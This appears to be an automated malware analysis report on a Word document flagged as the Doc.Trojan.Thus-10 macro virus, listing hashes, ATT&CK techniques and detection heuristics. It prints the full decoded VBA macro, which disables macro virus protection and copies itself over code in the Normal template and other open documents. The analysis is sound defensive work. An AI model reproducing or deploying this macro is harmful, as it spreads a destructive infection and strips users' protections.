Office (OLE) malware analysis — malicious · ecb56ee84188f8cb

MALICIOUS

Office (OLE)

40.5 KB Created: 2005-08-08 05:58:00 Authoring application: Microsoft Word 9.0 First seen: 2015-08-19

MD5: 7cb73c6d0cbe8a3f0eace628d8de0b78 SHA-1: ee9369b54b9afbcf42bb46ac30e20c8ba20fd48a SHA-256: ecb56ee84188f8cb22858dd3e48bc885d56b475df1c326679962c1c02c50b574

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that are designed to disable macro virus protection and replicate the malicious code to other documents and templates. This behavior is indicative of a self-propagating macro malware. The ClamAV detection name 'Doc.Trojan.Thus-10' further supports its malicious nature. The document body itself is a benign legislative text, suggesting the macro is the primary malicious component.

Heuristics 4

ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-10
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Application.Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2026 bytes
SHA-256: `f0ded045b5e46afdddc98699797bb9d871f11b8aac303a2967232b8a3c223bb3`
Detection ClamAV: Doc.Trojan.Thus-10 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Step2Project.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Defender' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Defender'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _ .CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _ .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _ .Item(1).CodeModule.CountOfLines) End If If NormalTemplate.Saved = False Then NormalTemplate.Save For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Defender'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.DeleteLines 1, Application.Documents.Item(k) _ .VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _ .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _ .VBComponents.Item(1).CodeModule.CountOfLines) End If Next k End Sub Private Sub Document_New() Document_Open End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.